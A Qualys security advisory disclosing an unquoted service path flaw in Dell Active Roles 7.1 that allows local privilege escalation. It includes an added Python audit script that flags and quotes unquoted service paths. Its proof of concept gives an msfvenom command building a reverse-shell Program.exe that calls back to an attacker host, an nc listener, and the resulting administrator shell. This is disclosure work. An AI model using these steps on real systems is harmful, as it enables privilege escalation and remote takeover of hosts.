Qualys Security Advisory QSA-2017-06-16 


Friday 16, 2017 


Dell Active Roles 7.x Unquoted Search Path Vulnerability 


SYNOPSIS: 


Dell Active Roles 7.1 uses a search path that contains an unquoted element, in which the element contains 
whitespace or other separators. This can cause the product to access resources in a parent path. 


Reference: https://www.oneidentity.com/products/active-roles


VULNERABILITY DETAILS: 


Lab Setup: 


1. Target: Dell ActiveRoles 7.1.2.3406 
2. Target IP Address: 10.113.14.112 


Vulnerable/Tested Version: 


Dell Active Roles 7.1.x running on Windows Server 2012. Older versions may also be affected. 


[Screenshot: Control Panel » Programs » Programs and Features on the target, listing Dell Active Roles 7.1 (Dell Software Inc., installed 6/15/2017, 231 MB, version 7.1.2.3406) alongside Microsoft ODBC Driver 11 for SQL Server, Microsoft SQL Server 2008 Setup Support Files and Microsoft SQL Server 2012 Native Client.]


Vulnerability: Unquoted Search Path Vulnerability 


The 'Active Roles Administration Service' uses a search path that contains an unquoted element, in which
the element contains whitespace or other separators. This can cause the product to access resources in a
parent path.


[Screenshot: Services console (services.msc) on the target. Active Roles Administration Service is listed as Running, Startup Type Automatic, Log On As ACTIVEROLES\Administrator.]


Service properties dialog for the Active Roles Administration Service (the executable path is shown without surrounding quotes):

Service name: ARAdminSvc
Display name: Active Roles Administration Service
Description: Active Roles component that responds to client [...], performs administrative tasks, and [...]
Path to executable: C:\Program Files\Dell\Active Roles 7.1\Service\arssvc.exe
Startup type: Automatic
Service status: Running
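As an added audit example (not part of the Qualys advisory or of the Dell product), the following Python splits a service ImagePath the way CreateProcess does, lists the ambiguous prefix paths whose parent directories must not be writable by unprivileged users, and produces the quoted ImagePath that removes the condition. The ARAdminSvc path is the one from the dialog above; the other service names and ImagePath values are constructed.

```python
import re

# Constructed sample ImagePath values for this example (not read from a live host).
# On a real system these strings live under
# HKLM\SYSTEM\CurrentControlSet\Services\<service>\ImagePath.
SAMPLE_SERVICES = {
    "ARAdminSvc": r"C:\Program Files\Dell\Active Roles 7.1\Service\arssvc.exe",
    "QuotedSvc": r'"C:\Program Files\Some Vendor\svc.exe" -run',
    "NoSpaceSvc": r"C:\Windows\system32\svchost.exe -k netsvcs",
}
_EXE_RE = re.compile(r"^(.*?\.exe)(?:\s+(.*))?$", re.IGNORECASE)

def split_image_path(image_path):
    """Return (executable, arguments): a quoted path ends at the closing quote,
    an unquoted one is cut after the first '.exe' (or taken whole)."""
    cmd = image_path.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end], cmd[end + 1:].strip()
    m = _EXE_RE.match(cmd)
    return (m.group(1), m.group(2) or "") if m else (cmd, "")

def ambiguous_prefixes(image_path):
    """Executables CreateProcess may try before the real binary when the path is
    unquoted and contains spaces (first token + '.exe', first two tokens + '.exe',
    ...). Their parent directories must not be writable by unprivileged users.
    A quoted path, or one without spaces, is unambiguous and yields []."""
    if image_path.strip().startswith('"'):
        return []
    exe, _ = split_image_path(image_path)
    tokens = exe.split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]

def quote_image_path(image_path):
    """Hardened form: executable wrapped in double quotes, arguments unchanged."""
    exe, args = split_image_path(image_path)
    return f'"{exe}"' + (f" {args}" if args else "")

def audit(services):
    """Services whose ImagePath is unquoted and contains spaces -> their prefixes."""
    return {name: ambiguous_prefixes(path)
            for name, path in services.items() if ambiguous_prefixes(path)}

if __name__ == "__main__":
    for name, prefixes in audit(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted ImagePath; check write ACLs on parents of:")
        for p in prefixes:
            print("    " + p)
        print("  fix -> " + quote_image_path(SAMPLE_SERVICES[name]))
```

On a Windows host the same check is usually run over the output of sc qc or the Win32_Service PathName property, and the fix is applied by rewriting the ImagePath value with the quoted form.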


Risk Factor: High 


Impact: 


If a malicious individual has access to the file system, it is possible to elevate privileges by placing a
file such as "C:\Program.exe" where a privileged program making use of WinExec will run it.


CVSS Score: AV:L/AC:L/Au:S/C:C/I:C/A:C


Proof-Of-Concept: 


1. Log into the target with a low-privileged account which has access to the file system.


[Screenshot: Command Prompt on the target. "net user testuser" shows a plain domain account (Group memberships: Domain Users; User may change password: No; Last logon 6/17/2017 1:42:25 AM), and "ipconfig" shows the target's adapter configuration.]


2. Create an executable file using MSFVenom.


root@kali:~/Desktop/DellActiveRoles# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.113.14.125 LPORT=443 -f exe > Program.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes


3. Copy this file to the C:\ drive on the target machine.


[Screenshot: Windows Explorer view of Local Disk (C:) on the target, showing Program.exe (Application, 7 KB) next to the inetpub, PerfLogs, Program Files, Program Files (x86), Users and Windows folders.]


4. Wait for a system reboot or for an administrator to restart the Active Roles Administration Service.


5. The target machine sends a reverse shell after the reboot or when the service is restarted.


C:\>netstat -anbo | find "443"
  TCP    10.113.14.112:64244    10.113.14.125:443    ESTABLISHED
[other UDP entries matching "443" omitted from the screenshot]


root@kali:~/Desktop/DellActiveRoles# nc -nvlp 443
listening on [any] 443 ...
connect to [10.113.14.125] from (UNKNOWN) [10.113.14.112] 64244
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
activeroles\administrator

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::9cf3:9670:19c:29e4%22
   IPv4 Address. . . . . . . . . . . : 10.113.14.112
   Subnet Mask . . . . . . . . . . . : [unreadable in screenshot]


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Kapil Khot, Qualys 
Vulnerability Signature/Research Team. 


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at
http://www.qualys.com or send email to research@qualys.com


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2017 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


